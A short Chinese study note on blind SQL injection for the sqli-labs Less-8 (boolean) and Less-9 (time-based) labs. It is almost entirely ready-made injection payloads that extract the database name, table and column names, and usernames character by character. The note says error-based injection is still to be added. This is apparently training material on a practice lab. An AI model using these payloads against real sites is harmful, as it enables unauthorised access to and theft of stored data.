sql盲注
sqli-less8布尔注入,跟dvwa差不多,下面列出猜解代码
查版本。?id=1’and left(version(),1)=5–+
查库名。?id=1’and ascii(substr(database(),1,1))=115–+
查表数。?id=1’and (select count(table_name)from information_schema.tables where table_schema=‘security’)=4–+
查表长。?id=1’and length(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1))=6–+
查表名。?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1))=101–+
查列数。?id=1’and (select count(column_name) from information_schema.columns where table_name=‘users’)=14–+
查列长。?id=1’and length(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1))=7–+
查列名。?id=1’and ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1))=117–+
查内容。?id=1’ and ascii(substr((select username from users limit 0,1),1))=68–+
sqli-less9时间注入,跟dvwa差不多,下面列出猜解代码
查库长。?id=1’and if(length(database())=8,1,sleep(5))–+
查库名。?id=1’and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+
查表数。?id=1’and if((select count(table_name)from information_schema.tables where table_schema=‘security’)=4,1,sleep(5))–+
查表长。?id=1’and if(length(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1))=6,1,sleep(5))–+
查表名。?id=1’and if(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1))=101,1,sleep(5))–+
查列数。?id=1’and if((select count(column_name)from information_schema.columns where table_name=‘users’)=14,1,sleep(5))–+
查列长。?id=1’and if(length(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1))=7,1,sleep(5))–+
查列名。?id=1’and if(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1))=117,1,sleep(5))–+
查内容。?id=1’ and if(ascii(substr((select username from users limit 0,1),1))=68,1,sleep(5))–+
报错注入还没实验,待补充